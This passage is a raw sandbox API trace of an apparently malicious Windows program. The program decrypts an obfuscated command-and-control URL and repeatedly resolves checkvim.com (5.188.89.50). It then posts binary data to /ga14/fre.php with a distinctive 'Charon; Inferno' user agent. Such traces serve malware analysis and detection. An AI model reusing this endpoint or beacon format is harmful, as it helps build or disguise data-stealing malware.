(Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0233.221] GetProcessHeap () returned 0x840000 [0233.221] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0233.221] GetProcessHeap () returned 0x840000 [0233.221] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0233.221] send (s=0x31c, buf=0x873a58*, len=237, flags=0) returned 237 [0233.223] send (s=0x31c, buf=0x87eb58*, len=159, flags=0) returned 159 [0233.223] GetProcessHeap () returned 0x840000 [0233.223] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0233.223] recv (in: s=0x31c, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0233.583] GetProcessHeap () returned 0x840000 [0233.583] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0233.583] GetProcessHeap () returned 0x840000 [0233.583] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7a0 | out: hHeap=0x840000) returned 1 [0233.583] GetProcessHeap () returned 0x840000 [0233.583] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0233.583] GetProcessHeap () returned 0x840000 [0233.583] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0233.583] closesocket (s=0x31c) returned 0 [0233.584] GetProcessHeap () returned 0x840000 [0233.584] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b48 | out: hHeap=0x840000) returned 1 [0233.584] GetProcessHeap () returned 0x840000 [0233.584] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0233.584] GetProcessHeap () returned 0x840000 [0233.584] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f878 | out: hHeap=0x840000) returned 1 [0233.584] GetProcessHeap () returned 0x840000 [0233.584] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713f8 | out: hHeap=0x840000) returned 1 [0233.589] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x8bc) returned 0x31c [0233.591] Sleep (dwMilliseconds=0xea60) [0233.593] GetProcessHeap () returned 0x840000 [0233.593] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0233.643] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.644] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0233.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.721] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0233.746] GetProcessHeap () returned 0x840000 [0233.746] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0233.747] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.748] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e930) returned 1 [0233.749] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.749] CryptSetKeyParam (hKey=0x87e930, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0233.750] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.750] CryptSetKeyParam (hKey=0x87e930, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0233.750] GetProcessHeap () returned 0x840000 [0233.750] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0233.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.755] CryptDecrypt (in: hKey=0x87e930, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0233.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.756] CryptDestroyKey (hKey=0x87e930) returned 1 [0233.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.757] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0233.757] GetProcessHeap () returned 0x840000 [0233.757] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0233.758] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0233.758] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0233.759] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0233.759] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0233.760] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0233.761] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0233.761] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0233.762] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0233.762] GetProcessHeap () returned 0x840000 [0233.762] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8711a0 [0233.762] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0233.762] GetProcessHeap () returned 0x840000 [0233.762] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8711a0 | out: hHeap=0x840000) returned 1 [0233.762] GetProcessHeap () returned 0x840000 [0233.762] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0233.762] GetProcessHeap () returned 0x840000 [0233.762] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0233.762] GetProcessHeap () returned 0x840000 [0233.762] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f758 [0233.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.763] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0233.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.769] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0233.775] GetProcessHeap () returned 0x840000 [0233.776] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0233.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.777] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e330) returned 1 [0233.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.778] CryptSetKeyParam (hKey=0x87e330, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0233.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.779] CryptSetKeyParam (hKey=0x87e330, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0233.779] GetProcessHeap () returned 0x840000 [0233.779] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0233.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.780] CryptDecrypt (in: hKey=0x87e330, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f758, pdwDataLen=0x19f9a4 | out: pbData=0x87f758, pdwDataLen=0x19f9a4) returned 1 [0233.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.782] CryptDestroyKey (hKey=0x87e330) returned 1 [0233.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.783] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0233.783] GetProcessHeap () returned 0x840000 [0233.783] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0233.784] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0233.784] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0233.785] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0233.785] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0233.786] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0233.786] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0233.786] GetProcessHeap () returned 0x840000 [0233.786] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0233.786] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0233.796] GetProcessHeap () returned 0x840000 [0233.796] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871ca8 [0233.796] socket (af=2, type=1, protocol=6) returned 0x320 [0233.796] connect (s=0x320, name=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0233.871] FreeAddrInfoW (pAddrInfo=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0233.871] GetProcessHeap () returned 0x840000 [0233.871] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f2d0 [0233.871] GetProcessHeap () returned 0x840000 [0233.871] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0233.872] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0233.873] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0233.873] GetProcessHeap () returned 0x840000 [0233.873] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0233.873] GetProcessHeap () returned 0x840000 [0233.873] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0233.873] GetProcessHeap () returned 0x840000 [0233.873] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fb48 [0233.873] GetProcessHeap () returned 0x840000 [0233.873] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0233.874] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0233.876] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0233.876] GetProcessHeap () returned 0x840000 [0233.876] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0233.876] GetProcessHeap () returned 0x840000 [0233.876] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0233.876] send (s=0x320, buf=0x873a58*, len=237, flags=0) returned 237 [0233.876] send (s=0x320, buf=0x87eb58*, len=159, flags=0) returned 159 [0233.877] GetProcessHeap () returned 0x840000 [0233.877] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0233.877] recv (in: s=0x320, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0234.246] GetProcessHeap () returned 0x840000 [0234.246] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0234.246] GetProcessHeap () returned 0x840000 [0234.246] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb48 | out: hHeap=0x840000) returned 1 [0234.246] GetProcessHeap () returned 0x840000 [0234.246] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0234.246] GetProcessHeap () returned 0x840000 [0234.246] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f2d0 | out: hHeap=0x840000) returned 1 [0234.246] closesocket (s=0x320) returned 0 [0234.247] GetProcessHeap () returned 0x840000 [0234.247] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871ca8 | out: hHeap=0x840000) returned 1 [0234.247] GetProcessHeap () returned 0x840000 [0234.247] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0234.247] GetProcessHeap () returned 0x840000 [0234.247] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f758 | out: hHeap=0x840000) returned 1 [0234.247] GetProcessHeap () returned 0x840000 [0234.247] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0234.252] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xcf4) returned 0x320 [0234.253] Sleep (dwMilliseconds=0xea60) [0234.255] GetProcessHeap () returned 0x840000 [0234.255] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa28 [0234.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0234.256] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0234.264] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0234.265] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f710) returned 1 [0234.276] GetProcessHeap () returned 0x840000 [0234.276] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0234.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0234.277] CryptImportKey (in: hProv=0x86f710, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e5b0) returned 1 [0234.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0234.279] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0234.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0234.284] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0234.284] GetProcessHeap () returned 0x840000 [0234.284] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0234.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0234.285] CryptDecrypt (in: hKey=0x87e5b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa28, pdwDataLen=0x19f9a4 | out: pbData=0x87fa28, pdwDataLen=0x19f9a4) returned 1 [0234.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0234.286] CryptDestroyKey (hKey=0x87e5b0) returned 1 [0234.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0234.286] CryptReleaseContext (hProv=0x86f710, dwFlags=0x0) returned 1 [0234.287] GetProcessHeap () returned 0x840000 [0234.287] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0234.287] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0234.287] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0234.288] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0234.288] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0234.289] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0234.289] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0234.290] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0234.290] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0234.290] GetProcessHeap () returned 0x840000 [0234.290] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0234.290] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0234.291] GetProcessHeap () returned 0x840000 [0234.291] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0234.291] GetProcessHeap () returned 0x840000 [0234.291] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0234.291] GetProcessHeap () returned 0x840000 [0234.291] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa28 | out: hHeap=0x840000) returned 1 [0234.291] GetProcessHeap () returned 0x840000 [0234.291] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f950 [0234.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0234.292] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0234.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0234.298] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0234.306] GetProcessHeap () returned 0x840000 [0234.306] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0234.307] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0234.307] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e8b0) returned 1 [0234.308] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0234.308] CryptSetKeyParam (hKey=0x87e8b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0234.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0234.309] CryptSetKeyParam (hKey=0x87e8b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0234.309] GetProcessHeap () returned 0x840000 [0234.309] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0234.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0234.310] CryptDecrypt (in: hKey=0x87e8b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f950, pdwDataLen=0x19f9a4 | out: pbData=0x87f950, pdwDataLen=0x19f9a4) returned 1 [0234.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0234.311] CryptDestroyKey (hKey=0x87e8b0) returned 1 [0234.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0234.312] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0234.312] GetProcessHeap () returned 0x840000 [0234.312] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0234.312] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0234.313] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0234.313] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0234.314] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0234.314] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0234.315] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0234.315] GetProcessHeap () returned 0x840000 [0234.315] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0234.315] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8713f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0234.317] GetProcessHeap () returned 0x840000 [0234.317] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b28 [0234.317] socket (af=2, type=1, protocol=6) returned 0x324 [0234.317] connect (s=0x324, name=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0234.388] FreeAddrInfoW (pAddrInfo=0x8713f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0234.388] GetProcessHeap () returned 0x840000 [0234.388] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86ff90 [0234.388] GetProcessHeap () returned 0x840000 [0234.388] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0234.389] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0234.389] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0234.390] GetProcessHeap () returned 0x840000 [0234.390] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0234.390] GetProcessHeap () returned 0x840000 [0234.390] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0234.390] GetProcessHeap () returned 0x840000 [0234.390] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fb00 [0234.390] GetProcessHeap () returned 0x840000 [0234.390] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0234.390] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0234.391] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0234.391] GetProcessHeap () returned 0x840000 [0234.391] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0234.391] GetProcessHeap () returned 0x840000 [0234.391] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0234.391] send (s=0x324, buf=0x873a58*, len=237, flags=0) returned 237 [0234.392] send (s=0x324, buf=0x87eb58*, len=159, flags=0) returned 159 [0234.392] GetProcessHeap () returned 0x840000 [0234.392] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0234.392] recv (in: s=0x324, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0234.780] GetProcessHeap () returned 0x840000 [0234.780] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0234.780] GetProcessHeap () returned 0x840000 [0234.780] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb00 | out: hHeap=0x840000) returned 1 [0234.780] GetProcessHeap () returned 0x840000 [0234.780] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0234.780] GetProcessHeap () returned 0x840000 [0234.780] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86ff90 | out: hHeap=0x840000) returned 1 [0234.781] closesocket (s=0x324) returned 0 [0234.816] GetProcessHeap () returned 0x840000 [0234.816] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b28 | out: hHeap=0x840000) returned 1 [0234.816] GetProcessHeap () returned 0x840000 [0234.816] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | 